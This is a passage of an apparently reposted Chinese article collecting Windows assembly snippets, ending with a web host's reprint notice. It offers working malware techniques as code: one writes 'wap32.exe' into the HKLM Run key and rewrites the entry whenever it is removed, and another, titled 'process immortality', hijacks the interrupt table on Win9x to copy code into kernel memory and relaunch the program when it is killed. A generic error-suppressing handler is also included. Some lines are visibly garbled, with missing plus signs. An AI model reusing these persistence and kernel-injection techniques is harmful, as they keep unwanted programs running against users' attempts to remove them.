.586p
.model flat,STDCALL
.data
HKeyStr db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
ValueName db 'wap32',0
PathName db 'wap32.exe',0
.code
extrn RegOpenKeyA: proc
extrn RegSetValueExA: proc
extrn RegCloseKey: proc
extrn ExitProcess: proc
extrn RegNotifyChangeKeyValue: proc
extrn CreateThread: proc
extrn Sleep: proc
extrn RegQueryValueExA: proc
start:
push eax
call RegOpenKeyA,080000002h,offset HKeyStr,esp
pop ebx
call RegSetValueExA,ebx,offset ValueName,0,01,offset PathName,100h
sub esp,100h
mov eax,esp
push 100h
call RegQueryValueExA,ebx,offset ValueName,0,0,eax,esp
pop eax
add esp,100h
push eax
call CreateThread,0,0,offset RegProtectProc,ebx,0,esp
pop eax
call Sleep,1000*60*3
ret
RegProtectProc proc hKey:dword
mov ebx,hKey
sub esp,100h
mov edi,esp
call GetProtectKeyName
db 'wap32',0
GetProtectKeyName:
pop esi
push 100h
call RegQueryValueExA,ebx,esi,0,0,edi,esp
pop eax
WaitRegChangeNotify:
call RegNotifyChangeKeyValue,ebx,0,4,0,0
call RegSetValueExA,ebx,esi,0,01,edi,100h
jmp short WaitRegChangeNotify
RegProtectProc endp
end start
3、 Windows 9x/2000 意外处理通用程序
此段程序可以达到屏蔽程序错误的效果
include wap32.inc
.386p
.model flat,stdcall
extrn MessageBoxA: proc
extrn ExitProcess: proc
.data
Msg db 'Fuck',0
SetSehFrame: ;ecx=忽略错误继续执行地址
pop eax ;弹出返回地址
push ecx ;保存忽略错误继续执行地址
call PushExceptionProc
jmp short Exception
PushExceptionProc:
push fs:dword ptr[0]
mov fs:[0],esp
call GetEspAddr
push D [edx] ;保存原Esp地址值
mov [edx],esp
jmp eax
ClearSehFrame:
pop eax ;弹出返回地址
call GetEspAddr
mov esp,[edx]
pop D [edx] ;恢复原Esp地址值
pop fs:dword ptr[0]
pop ecx
pop ecx ;弹出忽略错误继续执行地址
jmp eax
Exception proc pRecord,pFrame,pContext,pDispatch
call PushSehBackProc
call ClearSehFrame
jmp ecx
PushSehBackProc:
pop ecx
mov eax,pContext
mov [eax.cx_Eip],ecx
xor eax,eax ;忽略错误继续执行
ret
Exception endp
GetEspAddr:
call PushOffsetEspAddr
dd ?
PushOffsetEspAddr:
pop edx
ret
.code
Start:
call PushErrorProc
call MessageBoxA,0,offset Msg,offset Msg,0
ret
PushErrorProc:
pop ecx
call SetSehFrame
mov ds:[0],eax
call ClearSehFrame
ret
end Start
4、Windows 9x 下进程不死术
此段程序首先实现Win9x下注射远程线程(新技术)
然后与Win2k下进程不死术一样了。
include Win32.inc
.386p
.model flat,stdcall
extrn GetProcAddress: proc
extrn WinExec: proc
extrn MessageBoxA: proc
extrn Sleep: proc
extrn GetCurrentProcessId: proc
extrn OpenProcess: proc
extrn GetCurrentProcess: proc
extrn WriteProcessMemory: proc
extrn GetExitCodeProcess: proc
.data
;问题,要Sleep()这样做使Kernel32有机会更新数据
KnlThread proc ProcID:dword
call GetKnlOpenProcess
KnlOpenProcess dd ?
GetKnlOpenProcess:
pop eax
call [eax],PROCESS_ALL_ACCESS,FALSE,ProcID
or eax,eax
jz short ExitProtectProc
mov ebx,eax
call GetKnlWaitForSingleObject
KnlWaitForSingleObject dd ?
GetKnlWaitForSingleObject:
pop eax
call [eax],ebx,-1h
call GetFileNameAddress
GetFileNameAddress:
pop ecx
add ecx,offset FileName-offset GetFileNameAddress
call GetKnlWinExec
KnlWinExec dd ?
GetKnlWinExec:
pop eax
call [eax],ecx,01
ExitProtectProc:
ret
KnlThread endp
FileName db 'c:\wap32.exe',0
KnlOpenProcessStr db 'OpenProcess',0
KnlWaitForObjectStr db 'WaitForSingleObject',0
KnlWinExecStr db 'WinExec',0
KnlSleepStr db 'Sleep',0
KnlCreateKnlThreadStr db 'CreateKernelThread',0
.code
Start:
call GetProcAddress,0bff70000h,offset KnlOpenProcessStr
mov KnlOpenProcess,eax
call GetProcAddress,0bff70000h,offset KnlWaitForObjectStr
mov KnlWaitForSingleObject,eax
call GetProcAddress,0bff70000h,offset KnlWinExecStr
mov KnlWinExec,eax
call MoveDataToKnl,offset Start,0bff70600h,100h
call GetProcAddress,0bff70000h,offset KnlCreateKnlThreadStr
mov ebx,eax
call GetCurrentProcessId
push eax
call ebx,0,0,0bff70000h 600h,eax,0,esp
pop eax
call MessageBoxA,0,offset FileName,offset FileName,0
ret
MoveDataToKnl proc uses ebx esi edi,Src:dword,Des:dword,nCx:dword
push eax
sidt [esp-2]
pop eax
add eax,3*8
mov ebx,[eax]
mov edx,[eax 4]
call SetIdt03
pushad
mov [eax],ebx
mov [eax 4],edx
cld
rep movsb
popad
iret
SetIdt03:
cli
pop W[eax]
pop W[eax 6]
mov esi,Src
mov edi,Des
mov ecx,nCx
int 3;
sti
ret
MoveDataToKnl endp
end Start
5、简单算法,高效率压缩PE文件
文章整理:西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!
